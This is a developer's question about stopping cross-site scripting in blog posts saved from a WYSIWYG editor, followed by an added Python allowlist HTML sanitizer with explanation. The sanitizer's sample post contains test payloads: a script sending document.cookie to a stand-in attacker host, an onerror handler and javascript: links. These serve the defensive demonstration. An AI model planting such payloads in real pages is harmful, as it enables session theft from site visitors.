I'm in the process of building a small blog system to implement in our clients' websites. I have built a simple WYSIWYG text editor and everything works fine (almost...), but I store blog posts in a database. The problem is, I don't want malicious script to get in there. Also, if I escape the string, the HTML tags won't be able to format the text at the output (unless I'm unaware of something).
However, only people with accounts will be able to create blog posts on their website (small business owners). So, if a password is needed to access the text editor, do I need to protect it as much? Do I need HTML Purifier or something? Am I simply on the wrong path of doing it?
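The distinction the question hinges on, as an added example that is not part of the original post and not HTML Purifier's code: escaping the whole stored string removes the script but also removes the formatting, whereas an allowlist sanitizer keeps the handful of tags the editor produces and drops everything else (script blocks, event-handler attributes, `javascript:` links). The tag and attribute allowlists, the safe URL schemes and the sample post below are assumptions chosen for the demonstration; a real deployment should use a maintained library such as HTML Purifier rather than a hand-rolled parser, because the reader's browser, not the author's password, is what the stored HTML runs in, and an authoring account can be phished or shared.

```python
"""Allowlist HTML sanitizer vs. blanket escaping (added example, standard library only)."""
import html
from html.parser import HTMLParser

# Assumed allowlist: the formatting a small WYSIWYG editor typically emits.
ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "u", "h2", "h3",
                "ul", "ol", "li", "blockquote", "pre", "code", "a"}
VOID_TAGS = {"br"}                     # never pushed on the open-tag stack
ALLOWED_ATTRS = {"a": {"href"}}        # no style=, no on*= handlers anywhere
SAFE_SCHEMES = ("http:", "https:", "mailto:")
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "embed"}


def safe_href(value):
    """Return the href if it is relative or uses an allowed scheme, else None."""
    if value is None:
        return None
    raw = value.strip()
    if not raw:
        return None
    # Browsers ignore tabs/newlines inside a scheme, so "java\tscript:" still
    # executes; compare against a compacted, lower-cased copy of the value.
    compact = "".join(c for c in raw.lower() if c.isprintable() and not c.isspace())
    if ":" not in compact:
        return raw                     # relative URL such as /about or #top
    if compact.startswith(SAFE_SCHEMES):
        return raw
    return None                        # javascript:, data:, vbscript:, ...


class AllowlistSanitizer(HTMLParser):
    """Rebuilds the fragment from allowed tags; all text is re-escaped on output."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []            # for closing unclosed/mis-nested tags
        self.skip_depth = 0            # >0 while inside script/style/iframe...

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_CONTENT_TAGS:
                self.skip_depth += 1
            return
        if tag in DROP_CONTENT_TAGS:
            self.skip_depth = 1        # drop the element and its content
            return
        if tag not in ALLOWED_TAGS:
            return                     # drop the tag, keep its text content
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue               # onclick=, style=, src= ... all dropped
            if name == "href":
                value = safe_href(value)
                if value is None:
                    continue
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_CONTENT_TAGS:
                self.skip_depth -= 1
            return
        if tag in self.open_tags:      # close everything opened since it
            while self.open_tags:
                t = self.open_tags.pop()
                self.out.append("</%s>" % t)
                if t == tag:
                    break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))

    def handle_comment(self, data):
        pass                           # comments carry no formatting; drop them

    def result(self):
        while self.open_tags:
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitize(fragment):
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return parser.result()


def escape_everything(fragment):
    """What the question describes: safe, but every tag is now visible text."""
    return html.escape(fragment, quote=True)


# Constructed sample post mixing legitimate formatting with injection attempts.
SAMPLE_POST = (
    '<p>Hello <b>world</b>, see <a href="https://example.com">our site</a>.</p>'
    '<script>document.location="https://attacker.invalid/?c="+document.cookie</script>'
    '<img src=x onerror="alert(1)">'
    '<a href="javascript:alert(1)">click</a>'
    '<p onclick="alert(1)">para &amp; text</p>'
)

if __name__ == "__main__":
    print(sanitize(SAMPLE_POST))
    print(escape_everything(SAMPLE_POST))
```

Run as a script it prints the sanitized post (formatting intact, script, `onerror`, `onclick` and the `javascript:` link gone) followed by the fully escaped version, in which `&lt;b&gt;` appears as literal text and nothing is formatted. Sanitize on input before storing and still escape any plain-text fields on output; the two techniques answer different questions.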